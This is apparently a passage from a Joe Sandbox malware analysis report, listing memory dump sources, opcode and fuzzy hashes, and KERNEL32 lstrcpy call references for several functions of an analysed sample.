                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 4064b077e90b58e56c06589f38847abdbb46e271b3838fd849c3281e3c7b474f
                                • Instruction ID: e1ab0fc8aadb92aa348ecb4e767a6324457b118dd2f9652e55a3f34e82a40e9c
                                • Opcode Fuzzy Hash: 4064b077e90b58e56c06589f38847abdbb46e271b3838fd849c3281e3c7b474f
                                • Instruction Fuzzy Hash: 9F212AB0701B06DBD724DF2AC564A27B7F4AF54700B044A1EE586C7B61DB38E801CB98
                                APIs
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000), ref: 004D162D
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D164F
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D1671
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: cf63a8a46b49b2a56b4559bd0f639d3693a131e7221357da6c689bb6be01c1d0
                                • Instruction ID: 932f5114a257f6c3b00cfda505817d02f4d011beaf31d276fecdc97058077324
                                • Opcode Fuzzy Hash: cf63a8a46b49b2a56b4559bd0f639d3693a131e7221357da6c689bb6be01c1d0
                                • Instruction Fuzzy Hash: 7431C6B4A01B42AFD724DF3AD568953B7E5BF48304700492FA996C3B20DB78F811CB84
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004D162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1693
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 19b91ec2eae3c4e37f3f5ee0d5a22e88757eab2a66cda44c27d8c15b4f9b9134
                                • Instruction ID: 55b5e7f088eb9b1a56eeebf54617f390b62be25a7e70d302997662e8de6299c1
                                • Opcode Fuzzy Hash: 19b91ec2eae3c4e37f3f5ee0d5a22e88757eab2a66cda44c27d8c15b4f9b9134
                                • Instruction Fuzzy Hash: 3A1100B4611702ABDB149F36D528927B7F8AF54705708462FA896C3B60EB78E801CB58